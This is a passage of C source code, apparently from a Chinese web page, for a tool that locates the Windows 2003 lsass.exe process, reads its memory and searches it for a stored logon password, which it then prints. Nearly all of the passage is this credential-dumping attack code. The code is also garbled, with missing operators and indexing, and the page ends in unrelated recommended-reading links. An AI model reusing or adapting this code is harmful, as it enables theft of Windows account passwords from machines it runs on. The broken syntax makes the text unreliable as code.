Is Not Separated With A Space , But With A Ending Character , So Any Search API Like strstr() Will Fail To Locate
The Magic String , We Have To Do It Manually And Slowly
*/
if (Buffer == "L")
{
OffSet = 0;
if (strnicmp(&Buffer[iOffSet] , "LocalSystem" , strlen("LocalSystem")) == 0)
{
OffSet= strlen("LocalSystem")1;
if (strnicmp(&Buffer[iOffSet] , "Remote" , strlen("Remote")) == 0)
{
OffSet= strlen("Remote")1;
if (strnicmp(&Buffer[iOffSet] , "Procedure" , strlen("Procedure")) == 0)
{
OffSet= strlen("Procedure")1;
if (strnicmp(&Buffer[iOffSet] , "Call" , strlen("Call")) == 0)
{
i= OffSet;
break;
}
}
}
}
}
}
if (i < nSize)
{
ZeroMemory(Password , sizeof(Password));
for (; i < nSize ; i)
{
if (Buffer == 0x02 && Buffer[i1] == 0 && Buffer[i2] == 0 && Buffer[i3] == 0 && Buffer[i4] == 0 && Buffer[i5] == 0 && Buffer[i6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format , So We Will Do It In
That Way
*/
j = i7;
for (; j < nSize; j= 2)
{
if (Buffer[j] > 0)
{
Password[Count] = Buffer[j];
}
else
{
break;
}
}
return i7; // One Flag To Indicate We Find The Password
}
}
}
return -1; // Well , We Fail To Find The Password , And This Always Happens
}
// End Search
//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS , 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shotn");
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hProcessSnap , &pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return 0;
}
do
{
if (strcmpi(pe32.szExeFile , "Lsass.EXE") == 0)
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap , &pe32));
CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()
//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe"s PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char Buffer[5 * 1024] = ;
DWORD ByteGet = 0;
int Found = -1;
hProcess = OpenProcess(PROCESS_VM_READ , FALSE , PID); // Open Process
if (hProcess == NULL)
{
printf("Fail To Open Processn");
return FALSE;
}
if (!ReadProcessMemory(hProcess , (PVOID)BaseAddress , Buffer , 5 * 1024 , &ByteGet)) // Read The Memory From Lsass.exe
{
printf("Fail To Read Memoryn");
CloseHandle(hProcess);
return FALSE;
}
CloseHandle(hProcess);
Found = Search(Buffer , ByteGet); // Search The Password
if (Found >= 0) // We May Find The Password
{
if (strlen(Password) > 0) // Yes , We Find The Password Even We Don"t Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> "%s"n" , FoundBaseAddress , Password);
}
}
else
{
printf("Fail To Find The Passwordn");
}
return TRUE;
}
// End FindPassword
//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
推荐阅读
- 清除故障,让Windows 2003系统更加亲切
- 弓形虫病是如何传播的
- 极速狂飚 Windows 2003系统25招加速大法
- 在Windows 2003中实现网络共享还原
- Windows 2003中重置TCP/IP
- 如何让猫不乱撒尿
- Windows 2003常见故障解决方法
- 男方离婚如何不给抚养费
- 公司倒闭裁员如何补偿
- 如何改名字